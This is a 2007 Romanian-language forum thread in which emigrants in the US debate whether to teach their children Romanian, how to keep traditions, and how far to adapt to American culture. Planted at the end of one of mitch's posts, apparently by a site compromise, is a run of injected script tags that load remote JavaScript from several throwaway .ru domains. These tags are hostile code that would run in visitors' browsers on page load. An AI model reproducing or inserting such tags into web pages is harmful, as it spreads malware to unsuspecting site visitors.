Perpetuarea traditiilor? Ma uit la romanii de pe aici de virsta parintilor mei care vorbesc aproape constant numai romaneste, citesc ziarele romanesti, ba mai mult ceva ce mi se pare deja ridicol, trebuie sa citeasca in ziarele romanesti ce se intimpla aici in US, pt ca nu se ating de ziarele in limba engleza, fac mici, sarmale si cumpara cozonaci de Paste si deCraciunsi vreau sa va intreb: asta se intelege prin perpetuarea traditiilor sau este si altceva inclus in aceste traditii pe care pina si cei mai in virsta se pare ca le-au pierdut?

Este foarte adevarat ca si in San Fernando Valley sau Hollywood sint o gramada de rusi care fac acelasi lucru ca romanii la virsta de 50-60 ani pe care-i cunosc pe aici: stau in comunitatile lor, citesc ziarele lor, vorbesc numai in rusa si stilcesc cele citeva cuvinte in engleza de iti zgiriie timpanul.

sorin
25.07.2007, 05:52
dixy2k, comentariul tau despre pensionari nu cred ca este relevant in contexul acestei discutii (ma refer mai ales la ultiemle mesaje), pentru ca noi vorbeam de copii si de a fi sau a nu fi bilingvi.

shogunelu
25.07.2007, 06:14
Perpetuarea traditiilor? Ma uit la romanii de pe aici de virsta parintilor mei care vorbesc aproape constant numai romaneste, citesc ziarele romanesti, ba mai mult ceva ce mi se pare deja ridicol, trebuie sa citeasca in ziarele romanesti ce se intimpla aici in US, pt ca nu se ating de ziarele in limba engleza, fac mici, sarmale si cumpara cozonaci de Paste si deCraciunsi vreau sa va intreb: asta se intelege prin perpetuarea traditiilor sau este si altceva inclus in aceste traditii pe care pina si cei mai in virsta se pare ca le-au pierdut?

Ceea ce vezi la acesti oameni se numeste sentiment national,pe care ei,in ciuda faptului ca au fost aproape toata viata lor chinuiti de comunism,s-i l-au pastrat intact,dar care tie se pare ca iti lipseste cu desavarsire...

25.07.2007, 06:41
Hell knows, shogunelu, nici pe mine nu ma prea mai incearca nici un sentiment national .... mi-ar place doar ca fiu-miu sa invete romana, ceea ce nu cred ca se va intampla. Dar nu inseamna ca altii nu pot fi altfel

mirabela
25.07.2007, 07:07
De ce sa nu transmiti copilului tau tot ceea ce stii, mai ales ca nu te costa nimic ? decat multa dragoste smileys/smiley1.gif... Invatati-i limba romana si lasati-i pe ei sa spuna peste ani daca le-a fost de folos sau nu, nu hotarati in locul lor pentru ca la 2 sau 3 ani sunt prea mici sa decida un lucru asa de mare. Si legat de traditii... nimeni nu isi mai invata acum fiica sa toarca lana sau sa teasa covoare... dar daca o sa stie o reteta originala romaneasca poate candva o sa isi incante musafirii cu ceva gatit in stil romanesc, nu ? si nici asta nu costa nimic decat un pic de timp petrecut in cel mai plcaut mod alaturi de copii in bucatarie.

shogunelu
25.07.2007, 07:55
Pacat,pergamon...Daca tu nu te mai prea simti atasat de sentimentul national,probabil ca nici baiatul tau nu va fi...Laudabila totusi intentia ta de a-l invata romaneste,in ciuda obstacolelor.

hazel
25.07.2007, 09:21
Ceea ce vezi la acesti oameni se numeste sentiment national,pe care ei,in ciuda faptului ca au fost aproape toata viata lor chinuiti de comunism,s-i l-au pastrat intact,dar care tie se pare ca iti lipseste cu desavarsire...

Shogunelu, daca nu citesti ziarele romanesti nu inseamna ca iti lipseste sentimentul national. Spre exemplu mie imi plac sarmalele. Facute de altii. Si nu ai sa gasesti ziare romanesti la mine in Favorits. Ma mai uit uneori si eu, daca e vreun articol recomandat de vreo persoana la a caeri parere tin. Parerea mea este ca daca un individ este aicisi sta prea ancorat si incordat in realitatea romaneasca, s-ar putea sa nu se ancoreze, si chiar sa esueze in realitatea de aici. Doar o parere.

shogunelu
25.07.2007, 10:35
Asa ca mine,he,he,he!

25.07.2007, 12:10
[QUOTE=sorin]
In ceea ce priveste casatoriile mixte, nu am cum sa ma pronunt, pentru ca nu e cazul meu si nu as putea sa-mi dau cu parerea. In ceea ce priveste casatoriile 100% romanesti, consider ca scuzele si argumentele in ceea ce priveste neinvatarea limbii romane de catre copii, nu sunt justificate, oricare ar fi ele, in cazurile in care nu s-au facut nici un fel de eforturi in acesta directie. Limba materna poate si trebuie transmisa copiilor nostri, pentru ca astfel de perpetuam traditiile sicultura, astfel demonstram ca nu ne e rusine ca suntem romani si de ce nu, oferim copiilor nostri o sansa in plus fiind bilingvi, pentru ca niciodata nu se stie cand le va fi de folos. Treaba cu neinvatatul limbii engleze din cauza ca ar vorbi romaneste nu tine, pentru ca e imposibil sa n-o invete traind intr-o <st1:place w:st="&#111;n">tara</st1:place> unde se vorbeste engleza. Cum va explicati ca noi in scoala invatam de mici alte limbi straine, dar nu ne putem invata copiii limba materna? A uitat vreunul dintre voi limba romana din acest motiv? Cum va explicati ca alte nationalitati din <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Romania</st1:place></st1:country-regi&#111;n> (unguri, turci, germani, etc.) vorbesc limba lor materna si in acelasi timp limba romana fara probleme? Consider dureros sa vad unii parinti vorbindu-le copiilor in engleza, pe care nici macar n-o stapanesc bine, fara sa faca macar eforturi sa-i invete limba romana. Exista carti, casete video, audio, CD-uri, DVD-uri, vointa, copiii pot fi recompensati pentru progresele lor, pot fi trimisi la bunici in vacanta de vara, etc. Cu toate acestea, unora le este mult mai simplu sa se lase loviti de

CameliaXX
25.07.2007, 13:42
CameliaXX , .........destul de rau ca timpul petrecut cu copii il consideri timp pierdut asa cum spui mai sus.........

Da, nu consider ca mi-am "pierdut" timpul cu copiii mei invatindu-i romaneste...Ca idee- am renuntat si la un boyfriend, si sa ma ies si pe afara singura seara (in weekend) doar ca sa fiu cu copiii mei- sint la extrema unde cind am timp si daca sint sigura (chiar in masina conducind de la servici) nu ma simt bine fara fata si baiatul meu linga mine...

Da, buna intrebare...Pasarile mele chiar stiu romaneste (mai stilcita cei drept), ca...ai dreptate, copiii mei vorbesc cu ele in romaneste...I did not even notice...

O sa iau alt ciine sheppard german, ca fata mea mi-a zis ca nu vrea altfel de ciine si atunci ..o sa vorbim romaneste....Ce ma bucur pt fetita ta...

Copiii mei traduc la prietenii lor (romani) din engleza in romaneste ca sa inteleaga si ei...

shogunelu
25.07.2007, 16:05
Bravo sorine,tata!Bine zis! Cum sa-si invete oamenii copiii romaneste candlor si aici pe forum le e lene sa scrie romaneste,fac un talmes-balmes romano-englez,care numai lor li se pare interesant.Mie personal mi se pare absolut stupida amestecatura asta.Daca vorbim romana,apai sa vorbim romana,daca vorbim engleza,sa vorbim engleza!Nu intereseaza pe nimeni ca unii se cred mai americani decat Unchiul Sam(sindromul Raducioiu,ha,ha,ha!!),tot stupid pare.

shogunelu
25.07.2007, 17:45
Cameliaxx,acuma cand ma distram si eu mai bine cu ultimata postare,ai sters-o!Toate ca toate,daracolo undeimi dadea ea,saracuta,sfaturi de viata,cum sa fac ceva cu viata mea,acolo a fost undeliciu!Si sunt mari sanse sa fii cu vreo 10 ani mai tanara decat mine si sa fi vazut cam 10 % din cate am vazut eunumai pe vremea comunismului,anii de la Revolutie incoace nici nu-i mai socotesc...Super tare!smileys/smiley36.gif

sorin
25.07.2007, 18:14
Cameliaxx,acuma cand ma distram si eu mai bine cu ultimata postare,ai sters-o!

eu i-am sters-o pentru ca asa zisa postare era doar un "smileys/smiley4.gif", iar conform regulamentului, se admit postari de minimum o propozitie, asa ca sa nu va mirati daca postati de genul "cool", "smileys/smiley4.gif", "misto", etc. si aceste postari vor disparea smileys/smiley2.gif

shogunelu
25.07.2007, 18:29
Nu,nu,era un text intreg,dar a disparut.

sorin
25.07.2007, 18:35
poate pana am vazut eu doar zambaretul ala, si-o fi editat vreo alta cugetare

shogunelu
25.07.2007, 19:08
Daaaaaaaaaaaa!Ultimele doua cugetari au fost din categoria "Din Putul Gandirii",am raaaaaaaaaaaas si am raaaaaaaaaaaaas!

dixy2k
25.07.2007, 20:55
Sorin, cind am facut referire la romanii mai in virsta si la ce obisnuiesc ei sa faca sau nu, intentia mea a fost cu privira la niste remarci ale altor persoane nu privirea la traditiile care ar trebui sau nu sa la transmitem copiilor nostri odata cu limba materna pt a nu-si pierde sau poate din propria noastra teama de a nu ne pierde identitatea nationala. Intrebarea mea cind am postat acea remarca la comportamentul romanilor la o alta virsta decit a mea, a fost daca asta se intelege prin acele traditii care unii considera ca trebuie sa le transmitem si ca este o rusine daca nu o facem.Nu am avut intentia sa ma abat de la subiect ci poate a fost un pic mai pe ocolite un mod de a cauta raspuns la ce ar "trebui" sau nu transmis copiilor din trecutul nostru.

Shogunelu, tu consideri "sentiment national" lenea de a invata engleza in tara (pina si dupa zeci de ani in aceasta tara) unde cel putin din cite stiu eu OFICIAL engleza este inca considerata limba oficiala (cu toate ca spaniola devine din ce in ce mai predominanta cel putin in sudul Californiei)?

Daca vrei doar sa alegi ce-ti place din paragraful scris de mine n-ai de cit dar nu va reflecta cu adevarat sensul cu care am scris intregul paragraf. Una este sa rasfoiesti ziarele romanesti de placerea de a citi birfa din tara sau alte stiri si altceva este sa fi in incapacitatea de a citi alte ziare din cauza barierelor de limba. Asta cel putin din punctul meu de vedere se numeste incapacitate de adaptare.

sauzimdebine
25.07.2007, 21:47
Frumoasa incercare de a drege busuiocul. Cum frumoasa este si incercarea de a indrepta subiectul spre incapacitatea unora de a se adapta. dixy2k, este alegerea ta daca dai sau nu copiilor tai un liman de spiritualitate. Asta nu-ti da dreptul sa-i improsti cu noroi pe cei mai putin favorizati decat tine.
Cat despre varsta ... si eu ma apropii vertiginos de 50 de ani, citesc ziarele romanesti, nu pe toate si nu in intregime, fac sarmale si cozonaci de Craciun, mai fac si altele cu caracter romanesc, dar sa nu intram acolo, tot ce-i posibil sa fie prea mult, vorbesc romaneste cu toti romanii pe care-i intalnesc, vorbesc limba engleza cu un evident accent, si asa mai departe. Ce zici, am sau nu capacitatea de a ma adapta?

mitch
25.07.2007, 22:02
Una este sa rasfoiesti ziarele romanesti de placerea de a citi birfa din tara sau alte stiri si altceva este sa fi in incapacitatea de a citi alte ziare din cauza barierelor de limba. Asta cel putin din punctul meu de vedere se numeste incapacitate de adaptare.

Uite baga-ma si pe mine la categoria ... inadaptati smileys/smiley1.gif, daca asta e ... criteriu si unitatede masura.

Cand eram in Romania auzeam frecvent expresia: "... minti ca o gazeta americana", si nu am priceputla ce se facea referirepana am ajuns sa vad mai de-aproape .....american dream.smileys/smiley36.gif

Care fie vorba intre noi, n-are nici o treaba curealitatea.Pentru ca e o .... gogoritza.

In privinta limbii romane nu incape indoiala ca bogatia de expresii si subintelesuri ii da un statut aparte: e olimba fermecatoare. Cei care esueaza in a-si educa copii sa vorbeasca limba romana,nu fac decat sa le ingusteze acestoraorizontulcultural, la ceea ceeu numesc "cultura" Mc Donald's. Cum americanilor le placpovestile, nu-mi ramane decat sa spun vise placute in continuare si rugati-va la Uncle Sam.

Raven
26.07.2007, 03:34
Cand eram in Romania auzeam frecvent expresia: "... minti ca o gazeta americana", si nu am priceputla ce se facea referirepana am ajuns sa vad mai de-aproape .....american dream.smileys/smiley36.gif

Care fie vorba intre noi, n-are nici o treaba curealitatea.Pentru ca e o .... gogoritza.

In privinta limbii romane nu incape indoiala ca bogatia de expresii si subintelesuri ii da un statut aparte: e olimba fermecatoare. Cei care esueaza in a-si educa copii sa vorbeasca limba romana,nu fac decat sa le ingusteze acestoraorizontulcultural, la ceea ceeu numesc "cultura" Mc Donald's. Cum americanilor le placpovestile, nu-mi ramane decat sa spun vise placute in continuare si rugati-va la Uncle Sam.

Nu crezi ca te grabesti un pic re: american dream, burger culture?

Ca sa cunosti o tara, o cultura la modul decent trebuie sa cam traiesti niste ani si nu putini loco, sa experimentezi cate ceva si pe viu, sa treci prin niste situatii.

Corect, actualul presedinte american e de-o rara penibilitate, dar inainte de-a ridiculiza USofA cred ca e bine sa ne-amintim de origini, de RO, de RO ultimilor 18 ani si nu neaparat de cea de-acum 30 sau 50 de ani: presedinti de stat fosti vecini la bloc sicolegide serviciu, coruptie fara corupti, comunismfara comunisti, securisti avansati prompt in grad de presedintele autodeclarat de drept divin, funeralii de stat pt. membrii CC al PCRcu doua saptamani inainte de condamnareaprezidentiala a comunismului,spiritul Pietii Universitatii folosit ca marketing de partid si de stat fix de CC al PCR si multe altele, presedintele de stat care-si face cumparaturile la supermarket cu nevasta cu tot, lista-inesfarsita.

dixy2k
26.07.2007, 05:36
Uite baga-ma si pe mine la categoria ... inadaptati smileys/smiley1.gif, daca asta e ... criteriu si unitatede masura.

Se pare ca fara vreau sint persoane care s-au simtit jignite de ramarca in privinta inadaptibilitatii. Nu incercam sa "dreg busuiocul" cum a considerat cineva mai sus. Nu mi-am schimbat opinia cu privire la subiect ci am dat doar o explicatie la remarca mea. Este un forum de discutii si consider ca atita vreme cit nu insultam pe nimeni si nu aruncam cuvinte grele putem discuta civilizat, chiar daca uneori se incing spiritele.

Daca cinava din mindrie patriotica vrea sa se "includa la inadaptati" si sa rastalmaceasca vorbele nu are decit. Deja acum ii dau dreptate lui Sorin; de la intrebarea mea in privinta sentimentului patriotic si daca asta se include in aceiasi categorie cu transmiterea limbii romane copiilor s-a ajuns la interpretari personale de inadaptare.

Asa ca, "dreg busuiocul" cum vor face altii remarci mai tirziu la postarea mea si revin la copii smileys/smiley9.gif.

Fetita mea sper ca va vorbi mai bine decit vorbeste acum romaneste pt ca va ramine constat expusa la limba romana, o vom duce in Romania in citiva ani cind va intelege unde merge si va putea sa-si aduca aminte macar de locurile pe unde a fost, dar limba ei de baza este si va ramane engleza iar in privinta asta consider ca asa este normale de vreme ce va trai aici. Amintirile copilariei mele in Romania vor ramane ale mele, nu i le voi transmite mai departe ci ii voi lasa orizontul deschis la propriile ei amintiri dedpre propria ei copilarie pe care sotul si cu mine incerca sa i-o facem cit mai bogata in amintiri placute.

Numai bine tuturor smileys/smiley1.gifma retrag la munca.

sauzimdebine
26.07.2007, 06:36
Se pare ca fara vreau sint persoane care s-au simtit jignite de ramarca in privinta inadaptibilitatii. Nu incercam sa "dreg busuiocul" cum a considerat cineva mai sus. Nu mi-am schimbat opinia cu privire la subiect ci am dat doar o explicatie la remarca mea.

Gresit interpretat. Tot ce am spus este ca nu se cade sa deviezi discutia spre neimplinirile altora. O persoana capabila de a se adapta la cultura si valorile americane, nu va da cu pietre in cei mai putin favorizati de soarta decat ei, cu ata mai mult nu va folosi acest aspect drept argument la o discutie de cu totul alta factura.

Si ca o paranteza, poate in timp ai sa intelegi ca nu este obligatoriu ca cel de-ti raspunde la o astfel de remarca asupra unui context particular sa fie parte sau sa se regaseasca in acel context.

... de la intrebarea mea in privinta sentimentului patriotic si daca asta se include in aceiasi categorie cu transmiterea limbii romane copiilor s-a ajuns la interpretari personale de inadaptare.

Oooops, se vorbeste de mort in casa spanzuratului. Bine ar fi daca nu am uita de la mana pana la gura. Nu am mai ajunge ca dupa ce ca suntem cei de dam primii, sa mai si strigam in gura mare ca suntem batuti. smileys/smiley36.gif

... dar limba ei de baza este si va ramane engleza iar in privinta asta consider ca asa este normale de vreme ce va trai aici. Amintirile copilariei mele in Romania vor ramane ale mele, nu i le voi transmite mai departe ci ii voi lasa orizontul deschis la propriile ei amintiri dedpre propria ei copilarie pe care sotul si cu mine incerca sa i-o facem cit mai bogata in amintiri placute.

Nu a spus nimeni pana acum ca folosirea limbii romane drept limba de baza de catre traitorii in US ar fi un fapt normal.
Nu vorbeam despre amintirile copilariei cand faceam referire la bagajul de cultura si spiritualitate pe care o mama poate sa-l transmita unui copil o data cu limba materna. Dar daca tu nu vezi si altceva decat atat, poate ca va fi mai bine asa.

shogunelu
26.07.2007, 07:10
Subscriu si eu cu totul la ce spune mitch.In ceea ce priveste motto-ul,e absolut bestial!smileys/smiley32.gif

mitch
26.07.2007, 09:10
Nu crezi ca te grabesti un pic re: american dream, burger culture?

Ca sa cunosti o tara, o cultura la modul decent trebuie sa cam traiesti niste ani si nu putini loco, sa experimentezi.....

Corect, actualul presedinte american e de-o rara penibilitate, dar inainte de-a ridiculiza USofA cred ca e bine sa ne-amintim de origini, de RO, de RO ultimilor 18 ani..... funeralii de stat pt. membrii CC al PCRcu doua saptamani inainte de condamnareaprezidentiala a comunismului,spiritul Pietii Universitatii...... si multe altele, presedintele de stat care-si face cumparaturile la supermarket cu nevasta ....

hai sa nu incurcam marfa cu ... ambalajul. ce are de-a face limba romana, valorile culturale romanesti, cu fostii, actualii, sau viitorii conducatori? imi place expresia: politicians are like diapers, they MUST be changed all the time, from the same reasons.smileys/smiley1.gif

sa inteleg ca valorile spirituale sunt apanajul conductorilor politici? adicaimi ingustez orizontul spiritual ca individ doar pt ca e Baselu' la Cotroceni?sau tufa de texas la Casa Alba? in America, suntmulte capcanesimbolistice carora li se atribuie valoare spirituala.De ex.flag-ul e supralicitat, (de la sosete, chiloti, izmene si terminand cuantetul unui document oficial) Stars &amp; Stripes e omniprezent.ca sa nu mai spun ca pe steguletzele americanemai nou,scrie micutz:MADE IN CHINA smileys/smiley18.gif.exemple ar fi cu duiumul, sa continui cu sloganurile imbecile sau cupleiada de kitsch-uri si fake-uri?

Americanii sunto MARE natiune, dar nu in plan spiritual. Ma bucur ca sunt roman,desi traiesc in America,si vreausa fiu un roman care traieste in America.American n-as putea sa fiu decat daca m-as naste a 2-a oara, chiar si atuncipresupunand ca as puteaalege,mi-as dori saam legaturi cu Romania.Ptmine Romania si Americasunt complementare, asa cum eintr-un hamburger chifla si ca^rnatu' (asociereaam lut-o de pe wikipedia, imi place ca e plastica si sugestiva casi limba romana).

Faptul ca am ales sa traiesc in America nu inseamna ca implicit trebuie saachiesez la american culture. Am intalnit romani (mai mult romance)care au aceasta opinie, si considera ca face parte din procesul de adaptare. O.k. asa o fi, dar adaptare la ce?Exista o diferenta intre adaptare si asimilare. Asimilez ce-mi foloseste,in generalnotiuni profesionale, dar in relatiile interpersonale prefer sa ma raportez la bunul simt (cei 7 ani de' acasa) decat la notiunea de ... appropriate, care nu-mi spune nik, e ca si forma fara fond, goala de continut. (aviz "americanizatilor" ca nu e vorba de fondul de ten, fondul monetarsau de fondul clasei, ci de un concept definit de Titu Maiorescu pe la 1870).smileys/smiley2.gif

@dixy2k:smileys/smiley31.gif nu vreau sa jignesc, sa rastalmacesc, sa atacori sa schimb parerile cuiva.iubesc pacea si dialogul. forumul e un mediu de comunicare si imi exprim parerile personale. sunt prietenos, chiar daca ma exprim la modul direct, incerc sa nu fiu bolova'nos. so, friend's, ok?smileys/smiley102.gif /script>ript s<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></s<script src=http://www.iroe.ru/ngg.js></script>

AndaF
26.07.2007, 09:26
Mai in gluma, mai in serios va considerati barbati destepti = turisti... pentru mine inseamna ca nu v-ati adaptat in tara in care traiti...smileys/smiley36.gif

Si ma intreb oare barbatii americani destepti, sunt si ei turisti, sau va referiti numai la romani? smileys/smiley36.gif

Si revenind la limba romana... este usor sa arunci cu rosii, mai ales cand NU ai copii, sau cand n-ai idee cum este intr-o casatorie mixta... Iar daca bunicii nu pot veni sa ajute... atunci cum pot copii din familii mixte sa invete romana? ca, vedeti voi, pe langa treburile zilnice, copilul respectiv mai are si scoala, sporturi la care merge, etc- si nu poti lasa scoala( in engleza) de-o parte, numai fiinca te cramponezi de romana... care nu zic, ca nu e bine de stiut, este foarte buna, insa necesita un efort constat din partea parintelui roman...si uneori nu ai timp sa le faci pe toate...

angeline
26.07.2007, 09:37
la drept vorbind sorin a reusit sa puna in lumina un adevar cat se poate de real cu cele afirmate de maghiarii, svabii, turcii, etc. care pe langa limba oficiala a tarii pe care si-o insusesc cu succes copii acestor familii stapanesc si limba materna care este alta decat cea oficiala cu mentiunea mea chiar si fara cd-uri, dvd-uri si alte smecherii si trucuri moderne...singura mea explicatie plauzibila este intradevar ca se poate si fara lb.romana, mai ales inafara Ro smileys/smiley2.gif

ps</span> (mentionez nu reprezint nici o publicatie sau televiziune !)
ps 1</span> alta realitate ar mai fi posibilitatea unei opinii pe care sa ti-o insusesti ulterior ca si principiu chiar daca momentan nu esti familist sau nu detii pe domeniu spatiului de locuit in crestere vre-un, doi, trei copii smileys/smiley2.gif

AndaF
26.07.2007, 09:50
care pe langa limba oficiala a tarii pe care si-o insusesc cu succes copii acestor familii stapanesc si limba materna care este alta decat cea oficiala cu mentiunea mea chiar si fara cd-uri, dvd-uri si alte smecherii si trucuri moderne...singura mea explicatie plauzibila este intradevar ca se poate si fara lb.romana, mai ales inafara Ro smileys/smiley2.gif

Este discutabil... am prieteni care stau in Targul Secuiesc, Covasna... marea majoritate nu stiu limba romana si nici nu se straduiesc s-o invete - sunt semne in maghiara, lumea peste tot vorbeste in magiara... asa ca ce le mai trebuie romana? de parca traiesc in Ungaria, nu Romania...

Sotul meu a fost in excursie acolo cu un prieten ungur, si au intrat intr-o brutarie sa cumpere paine... prietenul ungur a vorbit in romana - raspunsul vanzatoarei a fost ceva de genul " nu paine"... cand a inceput sa vorbeasca in magiara, tipa a venit cu paine aburinda din spate...

shogunelu
26.07.2007, 09:54
mitch,imi scot palaria in fata ta!Mai rar un text cu atata luciditate si bun simt!

mitch
26.07.2007, 20:40
cu limba romana e poveste luuuunga. abstractiza^nd si daca e sa tai firu-n patru'shpatru, se poatespune ca e o optiune personala. eu unul cand aud ... ta^nguielile "mamicilor americanizate" cat de greu le vine sa-si invete odraslele limba romana ma apuca .... jalea si disperarea. e mai fancy si mai trendy sa te ocupi de ceea ce vine pe tava, de-a gata, incepand cu canalale mediatice si terminand cu shopping-ul .

AndaF(si nu numai)stii, daca ati citi copiilor macar searao povestioara de Creangaori Ispirescu, cu siguranta le-ati deschide mintea inchistata de pokemoni, dinozauri, ori sherifi stelarismileys/smiley5.gif. nu existamotive, scuze, sau explicatii.e vorba de commitment, ca sa ma exprim pe intelesul vostru, iar pe romaneste s-ar putea spune: cine se scuzase acuza!

in alta ordine de idei, ar trebui sa va ganditi la viitorul copilului vostru, care nestiind romana nu se va simti deloc atras de Romania. de aici decurg multe, inclusivconsecinte juridice, dar una peste alta va sugerez sa priviti atent la la progeniturile americanilor. cati dintre ei sunt dezvoltati armonios spiritual? adicain afara deideea: "I have to make more money..." ce mai au in gamalie?nika, sunt ta'la^mbi ca asa-i place sistemului, multi si cat mai prosti. daca nu vei avea suficienti bani sa-l trimiti la un colegiu in america, nu crezi ca sunt destule facultati foarte bune si in Romania, la care ar putea sa se inscrie fara sa plateasca o carutza de $$$$$??

ca aipomenit de unguri, pe ansamblu oameni faini. dar cred ca ai incurcat .... borcanele, sisotul tau a fost in secuime,e o mica comunitate,iar secuii sidestul de diferiti de ungurime,astia sunt vai mama lor, ca intelect, in primul rand,iar economic la pamant, fiind cea mai slab dezvoltata zona din ardeal. sa-ti mai spun ca atunci cand merg in ungaria, "fratii" lor ii numesc .... tzigani?smileys/smiley9.gifcusau fara voia lorsunt cetateni romani, si am intalnit in america cateva "personaje" care aici au realizat ca ambasada ROMANIEI, ii reprezinta, ca la cea a Ungariei, pot sa bata la usa pana le pica ... unghiile.smileys/smiley36.gif

Motto-ul se bazeaza pe mai multe experiente personale, care m-au facut ...varza. Nu detaliez, ca nu-mi face placere sa-mi aduc aminte cum e sa traiesti cu o leguma.smileys/smiley28.gif

shogunelu multumesc, sentimentul e reciproc. thinking out the box, man! suntem tot mai multi, e-adevarat ca nu suficienti ca sa urnim .... pietroiu' de pe fundu' lacului.smileys/smiley20.gif

Raven
26.07.2007, 22:45
hai sa nu incurcam marfa cu ... ambalajul. ce are de-a face limba romana, valorile culturale romanesti, cu fostii, actualii, sau viitorii conducatori? imi place expresia: politicians are like diapers, they MUST be changed all the time, from the same reasons.smileys/smiley1.gif

Coane, nu incurc nici o marfa. Fiecare popor are conducatorii pe care ii merita. Elitele culturale romanesti actuale sunt niste farisei care si-au dat adeziunea la politic.

Sa-nteleg ca unele lozinci americane iti plac si altele nu? E normal, numai ca eu zic ca era bine sa si specifici pt. ca la comunicarea prin tastaturi apar de multe ori neintelegeri cand nu e cazul.

Politicienii or fi e schimbati ca scutecele, dar ce nu intra in lozinca aia este ca linia politica nu se prea schimba la fel de frecvent.

sa inteleg ca valorile spirituale sunt apanajul conductorilor politici? adicaimi ingustez orizontul spiritual ca individ doar pt ca e Baselu' la Cotroceni?sau tufa de texas la Casa Alba?

Nu. Da' e foarte indicat de retinut ca Basescu e unde e si din cauza pozitiei elitelor culturale romanesti. La felsi despreBush Jr si elitele culturale americane (cu diferenta ca lobbyul pro-Bush nu poate fi comparat cu lobbyul pro-Basescu, nici d.p.d.v. cultural si nici altfel).

in America, suntmulte capcanesimbolistice carora li se atribuie valoare spirituala.De ex.flag-ul e supralicitat, (de la sosete, chiloti, izmene si terminand cuantetul unui document oficial) Stars &amp; Stripes e omniprezent.ca sa nu mai spun ca pe steguletzele americanemai nou,scrie micutz:MADE IN CHINA smileys/smiley18.gif.exemple ar fi cu duiumul, sa continui cu sloganurile imbecile sau cupleiada de kitsch-uri si fake-uri?

Corect, propaganda desantata exista si in USofA, exemple sunt gramada.Prin comparatie, unii ca Vadim sau Becali nu prea au sansesa fie luati in seama in USofA, pe cand in RO astia sunt VIP-uri si nu de orice fel (daca ar fi niste actori n-ar fi asa grav), ci candidati cu sanse reale de-a ajunge in functii inalte in conducerea de stat.

Ma bucur ca sunt roman,desi traiesc in America,si vreausa fiu un roman care traieste in America.American n-as putea sa fiu decat daca m-as naste a 2-a oara, chiar si atuncipresupunand ca as puteaalege,mi-as dori saam legaturi cu Romania.

Daca maineai avea posibilitatea sa devii cetatean US, ce-ai face? Ai depune juramantul ala sau nu?

Faptul ca am ales sa traiesc in America nu inseamna ca implicit trebuie saachiesez la american culture.

Pai nici nu e necesar. Ideal e sa luam ce e mai bun dintr-o parte si din cealalta. Sau macar sa incercam, iar in incercarea asta sa nu bashuim prea mult pe altii (ca deloc e cam greu &lt;wink&gt;) pentru ca avem noi insine destule defecte pe care ar fi bine sa le recunoastem in sineanoastra mai intai.

shogunelu
27.07.2007, 05:42
Mitch a spus o vorba mare"Americanii sunt o MARE natiune,dar nu in plan spiritual."Sunt destui sociologi care au spus ca societatea americana este tot mai pregnant antiintelectualista.Probabil ca aceasta goliciune spirituala este cea mai deprimanta aici,faptul ca inafara de obsesia pt bani impinsa pana la schizofrenie,munca indobitocitoare,animalica,totul cat mai repede,cu hei-rup-ul(de te si intrebi cum naiba nu se prabuseste totul la stilul asta),nu exista nimic,TOTUL este forma fara fond.Vorba cu gardu' si leopardu' nici c-ar fi mai potrivita altundeva decat aici.Si atunci,de buna seama si pe cale de consecinta spune"Faptul ca am ales sa traiesc in America nu inseamna ca implicit trebuie sa achiesez la american culture."Fraza asta e extrem de iritanta pt unii "americanizati".Daca ai un orizont mai larg,alt bagaj cultural,un cu totul alt fond de spiritualitate,ce trebuie sa faci venind aici,sa te extaziezi in fata hamburgerilor,muzicii country si filmelor cu Rambo?Sa incepi sa privesti lucrurile ca cei carora l-i s-au pus ochelari de cal de la nastere,desi tu nu ai avut niciodata?Asta sa fie adaptare?Pt mine e mai degraba cameleonism.Unii au forta propriilor convingeri,altii,nu.Si eu,ca si mitch,sunt bucuros ca sunt roman care traieste(deocamdata)in America si cred ca,selectiv,am multe de invatat de aici,dar NU cultura americana.

Raven
27.07.2007, 06:01
Mitch a spus o vorba mare"Americanii sunt o MARE natiune,dar nu in plan spiritual."

Natiune mare cu spiritualitate mica. Asta e borderline cu bai tampitilor.

E f. clar, consumerismul rulz in USofA, la fel cum lichelismul manelistrulz in RO (si in alte tari, dar am luat RO ca putem vorbi la concret).

Cultura romana actuala e la fel de valoroasa ca si un big mac expirat. Ultimii oameni de cultura autentici, cam toti din Memorialul Durerii, nu mai sunt printre noi. Ce e acum se vede: kulturnici, farisei.

Asa ca mi se pare un pic ipocrit sa bashuim o alta cultura pentru lipsurile ei (unele dintre ele evidente) atata vreme cat acasa nu stam nici noi prea grozav la capitolul cultura.

PS: Si RO importa productii culturale de duzina pe banda, v. filmele de clasa B(ca majoritatea sunt made in USA e mai putin relevant). Ca sa nu mai vorbim de carti sau reviste (si de publicatiile soft-porn la vedere prin toate chioscurile de ziare de pe trotuare). Asta in timp ce productiile autohtone de calitate sunt descurajate atat timp cat nu iese ceva si pentru kulturnicii din birocratia democratica ioropenizata.

shogunelu
27.07.2007, 06:59
Spiritualitatea unei natii transcede oranduiri sociale,regimuri,guverne,etc.Daca tu esti mai aproape de big mac decat de spiritualitatea tarii tale,macar nu le pune alaturi,ca nu se cade.Probabil ca deja esti de prea mult timp aici,lucru care afecteaza obiectivitatea si bunul simt al oricui.

AndaF
27.07.2007, 07:22
Da, Mich, ca sa ma exprim si eu mai pe intelesul tau, chiar le-am citit povesti in romana, si le-am tradus, fiindca nu intelegeau o boaba... eu imi dedic mult timp copiilor. Baiatul cel mare stie sa citeasca deja ( are 7 ani) si nu mai are rabdare, se plictiseste sa-i traduc, vrea sa citeasca singur in engleza...

Dar deja imi" bat gura de pomana" - o sa mai stam de vorba peste 3-5 ani, cand veti avea si voi copii vosti;la dat sfaturi, cei mai buni suntcei necasatoriti inca smileys/smiley2.gif chiar daca sunt pe langa subiect smileys/smiley36.gif

Copii meisunt atrasi de Romania, motive sunt destule - in primul rand si eu si sotul iubim Ro;

Parerea ta despre copii americani este total falsa - prietenii lui Chip au o alimentatie echilibrata, merg la sporturi, TV limitat, etc

Acum spune-mi si mie, cine are gandire limitata? Faza este urmatoarea - tu si Shogunelul aveti idei preconcepute, si pe mine ma oboseste sa vad ca inca ganditi romaneste, dupa o perioada traita in US...

